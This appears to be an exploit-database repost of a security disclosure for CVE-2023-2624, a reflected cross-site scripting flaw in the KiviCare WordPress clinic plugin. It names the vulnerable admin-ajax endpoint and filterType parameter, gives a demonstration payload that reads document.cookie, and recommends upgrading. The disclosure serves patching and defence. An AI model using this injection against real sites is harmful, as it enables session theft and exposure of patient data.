WordPress KiviCare 3.2.0 Cross Site Scripting

CVE Category Price Severity
CVE-2023-2624 CWE-79 $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2023-10-05

CVSS vector description

Our sensors found this exploit at:

Below is a copy:

WordPress KiviCare 3.2.0 Cross Site Scripting
# Exploit Title: WP Plugins KiviCare 3.2.0 - Reflected Cross-Site Scripting
# Date: 03-10-2023
# Exploit Author: Arvandy
# Software Link:
# Vendor Homepage:
# Version: 3.2.0
# Tested on: Windows, Linux
# CVE: CVE-2023-2624

# Product Description
KiviCare is the most affordable self-hosted clinic and patient management system based on the WordPress platform. Set up your online clinic in no time. Ref:

# Vulnerability overview:
The Wordpress plugins KiviCare - Clinic & Patient Management System (EHR) <= 3.2.0 is vulnerable to reflected cross-site scripting via the filterType parameter in the get weekly appointment function. This vulnerability could allow a malicious actor to inject malicious scripts.

# Proof of Concept:

Affected Endpoint: /wp-admin/admin-ajax.php?action=ajax_get&route_name=get_weekly_appointment&filterType=
Affected Parameters: filterType
XSS Payload: <img src=x onerror=alert(document.cookie)>

# Recommendation
Upgrade to version 3.2.1

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.